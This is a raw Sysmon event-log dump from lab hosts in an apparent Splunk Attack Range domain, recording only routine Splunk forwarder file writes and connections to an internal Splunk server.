16:27:48.143{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BEB55C4B84FA0595D66171F75B09235,SHA256=0304EAADD25434A993C1DB35ED2E5AA166DF9DD73FCD3E902A0422C4341717A2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245542Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:47.492{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64756-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245541Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:48.859{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38E0356FBB9B89CD2D4131724CFA3CCE,SHA256=FD49ACA35789AE030E5840653BC0BDE2119734B6044310458518DFCE231E5257,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245540Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:48.156{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A5FFF0B9269FF522FBC3FD853968B26D,SHA256=97A4233D59A52BCD1C635783398E153822EE91DBCA5DD849AC72A55987295E4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245539Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:48.156{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F0E9E11D1E3B7ABCCD4D9FF9B5F14670,SHA256=BAEF7D5926D785C7EC2080B6571C032AF96EC4FE520AC49AAE2EDF4984692946,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060877Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:49.518{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F02D614E175639853EB47E78843E4F98,SHA256=71AE01F14CB4C51FE13CB13CEEADBF11C8C754C365EA53345D6A0BCA0A048E01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245543Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:49.890{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=960CDD823423A894D8976EC51224BC6A,SHA256=76508E476083AC65C4AA8C2C7682332EDD3954A1E1CEE9A38A1BBCC76FFEC0AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060879Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:50.877{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F8890A870A9E4E6138E60FC4B99191B,SHA256=063C7097700F110DEE4379F9A09DE7237E74BEDF19DBB2A38912796855DC5167,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060878Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:50.205{7F8C56E7-4E3C-6063-1100-00000000AF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=5E49CBFD65973CADAAF02B71C9B68CC2,SHA256=7127803A3725F6358C967126EF9CF56EF8B853839B6436C7DBC0DE5CF99C0EAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245544Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:50.921{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAFA0449C5028132BF6AC09537FDB76F,SHA256=A75D6E40F7B264621746C93C692C488DB1FDBFE365AFC24CB312CEEC42741E68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060880Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:51.049{7F8C56E7-4E4C-6063-3300-00000000AF01}2364NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D9EB0706C587F50BBEE1233E6456AA7E,SHA256=500015F71F0118682B52F400F5B38916EBFAA2D1986DD68D3505915C1D0CDED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245545Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:51.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20B256D222C7C9CABA684A34C4E7CC05,SHA256=ED230FE0119695B741FD2B35A84C70C57158092E672C05BD14CD9CE542350AC7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060882Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:49.059{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54770-false10.0.1.12-8000- 23542300x80000000000000001060881Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:52.253{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FD98BB768CE45DC336042A1D6D776EC,SHA256=5A74B5BB1F20FF363E8D75336BEB3A15A2DE75F6C80470F5397B36C981339EA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245547Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:52.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=713351C2726E74FC41B42E2BF851251D,SHA256=423EB3374F03F6E03F6A6B29A00C85219E4E674C2BB9217E30439DA73FD44B62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245546Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:52.656{CB4067E1-304B-6062-1200-00000000AF01}1008NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=01E1DEF629DEC3F00AE22FE966E07ED5,SHA256=5AA56BF0FD168CC7A7061A1191ECEC058802E29705BCCEEF854D3D5542AFE4FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060884Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:53.612{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=716B16FBC43ADF555326D20EF0706EE9,SHA256=04A22B792118262CE0441D00C5396B404C54D47C87BF899A9B28613B6E3D767A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060883Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:49.887{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54771-false10.0.1.12-8089- 23542300x8000000000000000245550Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:53.968{CB4067E1-30AF-6062-9800-00000000AF01}2672NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D9EB0706C587F50BBEE1233E6456AA7E,SHA256=500015F71F0118682B52F400F5B38916EBFAA2D1986DD68D3505915C1D0CDED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245549Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:53.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEAE182AFC0C7AEDE5105E2BC26FA292,SHA256=55E4F6068414936C078E4D0EB4BFBF69C940B060946A02D59AD5FEF6D51D3FA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245548Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:53.125{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A5FFF0B9269FF522FBC3FD853968B26D,SHA256=97A4233D59A52BCD1C635783398E153822EE91DBCA5DD849AC72A55987295E4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060885Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:54.987{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC0D366C72AA32DF084AC7BA1C495C6A,SHA256=6449B5F510ACE779AE9E0E3D545F90A6ED8089806F4A5CB4E78618C17C44A28F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245552Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:54.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96D7DE851245EFFC21F25A89F049DA0A,SHA256=E1E81EBC0E5D2DF7A628E377C2D51FC1D43DB7B00D6F4BDE169F3474AFE5B87A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245551Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:52.555{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64757-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245554Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:55.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE851E07030E1C797137CBFB06FFE9B8,SHA256=14FB831F1B6B65AD8ABD2BECBAD384BB12AA7AE5C788C6C3CF5304010C9F6094,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245553Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:55.000{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8DA2ECB34FA2B0BEC7849682CBA997CF,SHA256=AD1B1ABDCD919E367FAB93C99BF0AF002272574BFF6DCE95576B303ED3C97AB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060886Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:56.347{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D968AD1BF7C9314E4A25B03F8E17597,SHA256=437DD47BDB29AFEEB2012E13B95DDF7DD0336DF5C795E5F5B7D20C55577BD753,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245556Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:56.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5E657F1AAE32A332EBD7B9B527FEA13,SHA256=21B750750C2663DF90E439CB6AD8E619E98A083559A7BB65FCD67798114E9A0D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245555Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:54.383{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64758-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x80000000000000001060888Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:57.706{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D33317D7163CE8883AAFE34125FDD5CF,SHA256=E99233F6841B36E7F8C225DDD63B7083AC34B3A0FD323A15E5EEFABAA2AAB7A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060887Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:57.019{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DEF92FE9628082CFD043BC4862D4243A,SHA256=F45CC6E8107541D31B20E8E0C4FCAF1718A6F6223BB02B4B23E3ACB373A9E536,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245557Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:57.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6C9F20D1AECE23FFCFECB9477217D5D,SHA256=0D5B1B13023496F554224A4F5B1985B62844038C48980E255FC954E00B1C3832,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060889Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:54.997{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54772-false10.0.1.12-8000- 23542300x8000000000000000245559Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:58.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9452CB1B796B3D6024D4A88440289C61,SHA256=544A31E62C8BCED9778D41C5A7CAA69170F7A422F29D95B9FCE7249F6D81C1A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245558Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:58.218{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EBAE56F5C33E58EC1D88D2C1CC8FC8C8,SHA256=D18B1A1DD2F62CC45A81FF2660AE9550D39A4B386C47E4253F5A31BD84A8B408,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060890Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:59.066{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD519DD6F1DDBADD9A04338C5E57A4C2,SHA256=E6BD5712D31956E453EC0BA5E7AEFF9E0D96B55BBFA1981E5D28E2F3CFBE1252,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245561Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:59.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52791154EAA0B82946CE6A8D74D754B6,SHA256=0EDBC9BBA4009D64CC8015D4334E4851B4CEAA4614B0F3E66A2B460DA07FFF6B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245560Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:57.602{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64759-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000001060891Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:00.425{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7C8CEA34D670E64F7E38CCF14052B4B,SHA256=80B9A7388071B97586390D4D9D7BC6B1C6E875660477826268F12B1ECF9FD426,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245562Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:00.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8FC1CF3E1C2CEDD3F7F0010758244C3,SHA256=7FD6832CE2FD713C9EE154D2EE75950963A824D9821B6AE3D6DE308D641C5A74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060892Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:01.785{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40893ED12FD782B117436370757A30B1,SHA256=27BF831EE64801B73F3546B2DD50A65848E5D408B7727C413630ECBA1036A54B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245563Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:01.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BA7393086352346F880C5D49EC0D335,SHA256=7B75F948F3A539F18EB91C9B738847681835B30ED8959743961CF8A1DD1EA0A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245564Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:02.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0AA1902E36A7632E1C252F916ECE4E6,SHA256=DAFC3D82F0776E20F744BA16C8106F0BDC418B4DEFF3F91D64E8A71B0C24C67E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060893Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:03.145{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=125B55BA827355E27F953C8BC0C5E3A5,SHA256=B28EE798613FB1718DDE7DE36E267A7100AB7C035DCCDCDE174C7F43EDC3084C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245568Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:02.633{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64760-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245567Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:03.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09BF0FEE3AFD75456D9516C351EEA490,SHA256=10EE10C3B87BBCCFF6A8667481B47F4A23B47BFA53C16479B829709B451437D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245566Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:03.218{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FA677F20548BE2637A8AA6E6A7D1E556,SHA256=7B4B7A7162CA86054BB1D6794F23B3798A53C8887706B531142360DCB2B95C8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245565Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:03.218{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=016281CEA3B2C8B7D0C86E0DEFF64C42,SHA256=04E7DB94870FBA14BB629EF028046D1713655FDCC9C4F47C55F428DE0BF4A023,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060895Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:04.504{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FDA05A73FB0FDA736560AB8C88CB715,SHA256=2B790B4C46A5A0BBF935CE973051C2EAC707F45F3059EF3FEFEA1F2568986104,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060894Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:00.872{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54773-false10.0.1.12-8000- 23542300x8000000000000000245569Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:04.953{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B37E9C982B154A43BEE96943D049BAC3,SHA256=462A58157898AF833481D93816BC8F9FBDCD1BAFD99C89B88066E1ADCC28CACE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060897Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:05.879{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=887D9472166C791B382372474E469D0B,SHA256=BE14DFFB0346A5D89B71DB02C505DFBFAAA4151369E63EA0AAA08106BD434940,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060896Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:05.879{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AEA1C54FDDA66FC7BC307D60911341F,SHA256=CDAD34CFB7DD002F8F7C73EF45E7686CBF4BD362AEA9BF31C4A060ED67CD8AE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245570Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 